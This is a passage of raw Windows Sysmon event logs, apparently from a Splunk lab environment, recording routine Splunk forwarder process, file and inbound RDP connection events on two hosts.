14:57:01.202{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EBBD-607E-A90B-00000000BB01}7020C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000073352Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:01.203{A7A01FEF-EBBD-607E-A90B-00000000BB01}7020C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000073351Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:01.140{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=C3BB0363CCCA85AC4EB08861DAB1AD2B,SHA256=32F4E194406ED7F747844394A76983814450FED81E718EA7EFD628CFFD3F98AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073350Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:01.077{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050202Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:59.767{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52518-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000050201Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:59.529{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com53653-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050200Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:59.339{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50668-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050199Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:01.269{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=480D41007111F9C4FD65B23C5DDB3E18,SHA256=E64FB8A61730D378CE96427C16845EC361C6F7679949EA683970569D8F37DD29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050198Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:01.191{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=90373C952833B87D673E763C9B3E9604,SHA256=6ED3F00EC7F9F991CEFC731AA568F943A6198BE8A5096D343E3E8CEDEB51397C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073386Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:02.656{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC8C2AD4F03DA53A2DDD78F686AA7C9F,SHA256=FB7B2497E715F7737AE552FFB4CDA075E06E2D4EF1292DB4D27D83E8E2F7A51E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000073385Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:02.656{A7A01FEF-EBBE-607E-AB0B-00000000BB01}48561684C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073384Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:02.499{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EBBE-607E-AB0B-00000000BB01}4856C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073383Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:02.499{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073382Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:02.499{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073381Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:02.499{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073380Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:02.499{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073379Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:02.499{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBBE-607E-AB0B-00000000BB01}4856C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073378Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:02.499{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EBBE-607E-AB0B-00000000BB01}4856C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000073377Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:02.502{A7A01FEF-EBBE-607E-AB0B-00000000BB01}4856C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000073376Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:02.327{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=879376F3999B640C77030766127FEAC4,SHA256=894F6DA4BA8D760BA1B1A56D588843E455F4656E44B5EF1612E09F57F1516F72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073375Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:02.296{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FAEE40ED565FE9D3A601EBCC01DB1EC6,SHA256=5B66AFACBC4973C613B645298A584B6D913B64961777E54F2A791D443CE2451F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050204Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:02.988{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=434662E4A307C83B812DB5E59396CF37,SHA256=9A3904DE2E35D681F2821E4661C659182FD7204CDCC5D165B5D69303A410C75D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050203Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:02.285{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39D3C8EFCC199B94C7D635514E6878CB,SHA256=5779EBC80D8A4626CB5418CD50EFA84FA5B4E3BF78178F5865AEDE3673CA69DA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000073408Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:03.905{A7A01FEF-EBBF-607E-AD0B-00000000BB01}32885648C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000073407Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:02.659{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-6637-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000073406Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:03.734{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EBBF-607E-AD0B-00000000BB01}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073405Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:03.734{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073404Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:03.734{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073403Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:03.734{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073402Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:03.734{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073401Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:03.734{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBBF-607E-AD0B-00000000BB01}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073400Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:03.734{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EBBF-607E-AD0B-00000000BB01}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000073399Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:03.735{A7A01FEF-EBBF-607E-AD0B-00000000BB01}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000073398Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:03.702{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=999136BFA0365284C231CDCF08F5D6C5,SHA256=046C425E774CC8F114A1FCC0B1BCBFA480FA99BEF6F1188A7F5BD0EB0019853C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050206Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:00.936{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-52145-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050205Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:03.301{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB5576E7B8AC483501B4073CC86DC623,SHA256=DDFB8C531E98EE858B6D6A6862BE0903111FA3E7F3C6F96C86FC544611D3ABFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073397Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:03.562{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 